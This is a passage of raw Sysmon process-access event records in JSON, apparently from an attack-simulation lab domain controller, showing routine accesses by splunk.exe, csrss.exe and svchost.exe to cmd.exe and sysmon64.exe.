07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010BC820500}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010BC820500}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 